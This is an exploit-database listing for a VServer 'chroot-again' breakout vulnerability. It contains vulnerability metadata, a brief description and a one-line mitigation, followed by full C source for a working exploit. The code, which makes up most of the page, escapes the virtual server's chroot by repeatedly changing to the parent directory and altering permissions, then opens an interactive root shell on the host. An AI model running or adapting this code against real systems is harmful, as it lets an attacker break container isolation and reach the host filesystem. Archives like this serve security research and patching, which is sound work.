header-logo
Suggest Exploit
vendor:
VServer
by:
vserver@deadbeef.de
7,2
CVSS
HIGH
Chroot-Again Style Vulnerability
22
CWE
Product Name: VServer
Affected Version From: VServer 1.24
Affected Version To: VServer 2.4.24
Patch Exists: YES
Related CWE: N/A
CPE: a:vserver:vserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

VServer Breakout Vulnerability

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a 'chroot-again' style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory. vserver@deadbeef.de modified the chroot-again exploit to work on vservers with 'chmod 000 /vservers'. The exploit code is written in C and can be run in a vserver as root. It has been tested with 2.4.24 and vserver 1.24.

Mitigation:

Ensure that the VServer application is up to date and properly configured to prevent unauthorized access.
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/9596/info

VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory.
*/

/* vserver@deadbeef.de modified the chroot-again exploit */
/* to work on vservers with "chmod 000 /vservers" */

/* Run this code in a vserver as root */
/* Tested with 2.4.24 and vserver 1.24 */

#include <sys/types.h>
#include <sys/stat.h>

main()
{
int i;

if (chdir("/") != 0) {
  perror("cd /"); exit(1);
}
if (mkdir("baz", 0777) != 0) {
  perror("mkdir baz");
}
if (chroot("baz") != 0) {
  perror("chroot baz"); exit(1);
}

for (i=0; i<50; i++) {
   if (chdir("..") != 0) {
      perror("cd .."); /* exit(1); */
   }
   if (chmod("..", S_IXOTH) != 0) {
      perror("chmod"); /* exit(1); */
   }
}
if (chroot(".") != 0) {
  perror("chroot ."); exit(1);
}
printf("Exploit seems to work. =)\n");
execl("/bin/sh", "sh", "-i", (char *)0);
perror("exec sh");
exit(0);
}

Navigation

Suggest Exploit

Services By CQR